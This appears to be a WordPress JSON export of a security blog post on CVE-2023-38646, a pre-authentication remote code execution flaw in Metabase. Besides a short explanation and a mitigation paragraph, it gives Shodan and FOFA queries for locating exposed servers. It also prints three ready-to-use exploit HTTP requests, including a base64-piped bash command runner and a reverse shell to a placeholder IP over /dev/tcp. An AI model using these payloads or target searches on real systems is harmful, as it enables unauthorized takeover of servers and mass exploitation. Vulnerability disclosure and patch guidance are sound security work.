{"id":2920,"date":"2023-07-25T15:19:13","date_gmt":"2023-07-25T15:19:13","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=2920"},"modified":"2023-10-03T11:24:32","modified_gmt":"2023-10-03T11:24:32","slug":"metabase-rce-cve-2023-38646","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/","title":{"rendered":"Metabase RCE: CVE-2023-38646"},"content":{"rendered":"<h3 class=\"wp-block-heading\">Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646<\/h3>\r\n\r\n\r\n\r\n<p><a href=\"https:\/\/secry.me\/explore\/news\/metabase-rce-cve-2023-38646\/\">CVE-2023-38646<\/a>, Metabase RCE: <a href=\"http:\/\/metabase.com\/\">Metabase<\/a> is a tool for business intelligence and data visualization that has emerged as a preferred choice, seamlessly transforming data into insightful dashboards.<\/p>\r\n\r\n\r\n\r\n<p>However, recent revelations have cast a spotlight on a significant security flaw within Metabase versions prior to 0.46.6.1 for the open-source variant and 1.46.6.1 for the Enterprise edition.<\/p>\r\n\r\n\r\n\r\n<p>This vulnerability, labeled as <strong>CVE-2023-38646<\/strong>, 
has the potential to expose servers to arbitrary command execution by attackers, without authentication.<\/p>\r\n\r\n\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">About the Vulnerability<\/h3>\r\n\r\n\r\n\r\n<p>According to the Assetnote blog, the vulnerability resides in the Metabase API endpoint <code>\/api\/setup\/validate<\/code>. This endpoint&#8217;s purpose is to validate database connections during the setup process. A setup token, generated upon Metabase initialization, is required to access this endpoint.<\/p>\r\n\r\n\r\n\r\n<p>This token was meant to aid in the completion of the initial setup and should ideally be used once. However, through meticulous analysis, researchers stumbled upon an unexpected twist &#8211; the setup token remained accessible even after the setup phase, creating a potential gateway for exploitation.<\/p>\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Metabase Remote Code Execution<\/h3>\r\n\r\n\r\n\r\n<p>Moving beyond the initial setup token exposure, researchers embarked on a journey towards achieving reliable remote code execution (RCE). The <code>\/api\/setup\/validate<\/code> endpoint accepted JDBC URIs, thereby opening avenues for exploitation through various database connectors.<\/p>\r\n\r\n\r\n\r\n<p>While attempts to exploit the H2 database&#8217;s INIT parameter were initially hindered, ingenious maneuvering led researchers to an SQL injection vulnerability within the H2 database driver. 
This newfound vulnerability allowed for code execution without relying on the previously obstructed INIT parameter.<\/p>\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3>Dork to Find Targets using Metabase<\/h3>\r\n<p><strong>Shodan.io<\/strong><br \/>&#8211; http.html:Metabase<br \/>&#8211; http.title:Metabase (<em>twitter @win3zz<\/em>)<\/p>\r\n<p><strong>FOFA app <\/strong>(<em>twitter @HunterMapping<\/em>)<br \/>FOFA app=&#8221;Metabase&#8221;<br \/>Shodan product:&#8221;Metabase&#8221;<\/p>\r\n<p><strong>Twitter @fofabot<\/strong><br \/>FOFA Query: FOFA app=&#8221;Metabase&#8221; <br \/>Link: https:\/\/en.fofa.info\/result?qbase64=YXBwPSJNZXRhYmFzZSI%3D<\/p>\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Proof Of Concept for CVE-2023-38646<\/h3>\r\n\r\n\r\n\r\n<p>To exploit this vulnerability manually, you can follow these simple steps:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\">\r\n<li>Visit <code>\/api\/session\/properties<\/code> and get the token from &#8220;setup-token&#8221;.<\/li>\r\n\r\n\r\n\r\n<li>You can use one of the three POST requests below, which I gathered from Twitter, to reproduce the vulnerability:<\/li>\r\n<\/ol>\r\n\r\n\r\n\r\n<p>Using the sample H2 database provided inside Metabase\u2019s JAR file (recommended):<\/p>\r\n\r\n\r\n\r\n\r\n\r\n<pre class=\"wp-block-code\"><code>POST \/api\/setup\/validate HTTP\/1.1\r\nHost: \r\nContent-Type: application\/json\r\nContent-Length: 812\r\n\r\n{\r\n    \"token\": \"YOUR-TOKEN\",\r\n    \"details\":\r\n    {\r\n        \"is_on_demand\": false,\r\n        \"is_full_sync\": false,\r\n        \"is_sample\": false,\r\n        \"cache_ttl\": null,\r\n        \"refingerprint\": false,\r\n        \"auto_run_queries\": true,\r\n        \"schedules\":\r\n        {},\r\n        \"details\":\r\n        {\r\n            \"db\": \"zip:\/app\/metabase.jar!\/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS 
$$\/\/javascript\\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YOUR-BASE64}|{base64,-d}|{bash,-i}')\\n$$--=x\",\r\n            \"advanced-options\": false,\r\n            \"ssl\": true\r\n        },\r\n        \"name\": \"an-sec-research-team\",\r\n        \"engine\": \"h2\"\r\n    }\r\n}<\/code><\/pre>\r\n\r\n\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n<p>Using org.h2.Driver with the postgres engine:<\/p>\r\n\r\n\r\n\r\n<pre class=\"wp-block-code\"><code>POST \/api\/setup\/validate HTTP\/1.1\r\nHost: localhost:3000\r\nContent-Length: 416\r\nAccept: application\/json\r\nContent-Type: application\/json\r\nUser-Agent: Mozilla\/5.0 \r\nConnection: close\r\n\r\n{\"token\":\"YOUR-TOKEN\",\"details\":{\"details\":{\r\n\"subprotocol\":\"h2\",\r\n\"classname\":\"org.h2.Driver\",\"advanced-options\":true,\r\n\"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\\\"sh\\\", \\\"-c\\\", cmd})\\\\;}$$\\\\;CALL SHELLEXEC('bash -i &gt;&amp;\/dev\/tcp\/IP-REVERSE\/1337 0&gt;&amp;1');\"},\"name\":\"x\",\"engine\":\"postgres\"}}\r\n<\/code><\/pre>\r\n\r\n\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n<p>POST request 3, which is similar to the first:<\/p>\r\n\r\n\r\n\r\n<pre class=\"wp-block-code\"><code>POST \/api\/setup\/validate HTTP\/1.1\r\nHost: localhost:3000\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*\r\nAccept-Language: en-US;q=0.9,en;q=0.8\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/115.0.5790.110 Safari\/537.36\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: application\/json\r\nContent-Length: 739\r\n\r\n{\r\n    \"token\": \"YOUR-TOKEN\",\r\n    \"details\":\r\n    {\r\n        \"is_on_demand\": false,\r\n        \"is_full_sync\": false,\r\n        \"is_sample\": false,\r\n        \"cache_ttl\": null,\r\n        \"refingerprint\": false,\r\n        \"auto_run_queries\": true,\r\n        
\"schedules\":\r\n        {},\r\n        \"details\":\r\n        {\r\n            \"db\": \"zip:\/app\/metabase.jar!\/sample-database.db;MODE=MSSQLServer;\",\r\n            \"advanced-options\": false,\r\n            \"ssl\": true,\r\n            \"init\": \"CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$\/\/javascript\\u000A\\u0009java.lang.Runtime.getRuntime().exec('touch \/tmp\/success')\\u000A$$\"\r\n        },\r\n        \"name\": \"an-sec-research-team\",\r\n        \"engine\": \"h2\"\r\n    }\r\n}<\/code><\/pre>\r\n\r\n\r\n\r\n\r\n\r\n<p><br \/><strong>Other PoCs<\/strong> are covered in this blog post (https:\/\/blog.calif.io\/p\/reproducing-cve-2023-38646-metabase), or you can use this tool: <a href=\"https:\/\/github.com\/robotmikhro\/CVE-2023-38646\/\">https:\/\/github.com\/robotmikhro\/CVE-2023-38646<\/a><\/p>\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">The Way Forward: Mitigation and Awareness<\/h3>\r\n\r\n\r\n\r\n<p>To address the CVE-2023-38646 vulnerability, Metabase released <a href=\"http:\/\/metabase.com\/blog\/security-advisory\">advisories<\/a> and versions that offer remedies. Upgrading to versions 0.46.6.1 (open-source) and 1.46.6.1 (Enterprise) is the primary step to safeguard against potential exploitation. For instances where an immediate upgrade isn&#8217;t feasible, blocking requests to <code>\/api\/setup<\/code> endpoints and meticulous monitoring are recommended steps. 
Additional insights, mitigation strategies, and release information can be accessed through Metabase&#8217;s official advisories.<\/p>\r\n","protected":false},"excerpt":{"rendered":"<p>Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tool for business intelligence and data visualization that has emerged as a preferred choice, seamlessly transforming data into insightful dashboards. 
However, recent revelations have cast a spotlight on a significant security flaw within Metabase versions prior to 0.46.6.1 for the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2954,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[194,131,195,201],"tags":[],"class_list":{"0":"post-2920","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cyber-security","8":"category-news","9":"category-tips-and-tricks","10":"category-tools"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.4 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Metabase RCE: CVE-2023-38646 | SECRY<\/title>\n<meta name=\"description\" content=\"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tool for business intelligence and data\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Metabase RCE: CVE-2023-38646 | SECRY\" \/>\n<meta property=\"og:description\" content=\"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tool for business intelligence and data\" \/>\n<meta property=\"og:url\" content=\"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/\" \/>\n<meta property=\"og:site_name\" content=\"SECRY\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/secry.me\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-25T15:19:13+00:00\" \/>\n<meta property=\"article:modified_time\" 
content=\"2023-10-03T11:24:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/secryweb.sirv.com\/WP_secry.me\/2023\/08\/CVE-Metabase-RCE.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Christin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Christin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"NewsArticle\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\"},\"author\":{\"name\":\"Christin\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\"},\"headline\":\"Metabase RCE: CVE-2023-38646\",\"datePublished\":\"2023-07-25T15:19:13+00:00\",\"dateModified\":\"2023-10-03T11:24:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\"},\"wordCount\":477,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"articleSection\":[\"Cyber Security\",\"Hacker News\",\"Tips and 
Tricks\",\"Tools\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\",\"name\":\"Metabase RCE: CVE-2023-38646 | SECRY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"datePublished\":\"2023-07-25T15:19:13+00:00\",\"dateModified\":\"2023-10-03T11:24:32+00:00\",\"description\":\"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tool for business intelligence and data\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"contentUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"width\":1280,\"height\":720,\"caption\":\"Metabase RCE 
(CVE-2023-38646)\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/secry.me\\\/explore\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Metabase RCE: CVE-2023-38646\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"name\":\"SECRY\",\"description\":\"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections\",\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"alternateName\":\"Security Story\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/secry.me\\\/explore\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\",\"name\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\",\"alternateName\":\"SECRY\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"contentUrl\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"width\":512,\"height\":512,\"caption\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story 
Collections\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/secry.me\",\"https:\\\/\\\/pinterest.com\\\/secry_me\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\",\"name\":\"Christin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"caption\":\"Christin\"},\"description\":\"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.\",\"sameAs\":[\"https:\\\/\\\/secry.me\\\/explore\"],\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/author\\\/secry\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. 
-->","_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/2920","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=2920"}],"version-history":[{"count":27,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/2920\/revisions"}],"predecessor-version":[{"id":3439,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/2920\/revisions\/3439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/2954"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=2920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=2920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=2920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}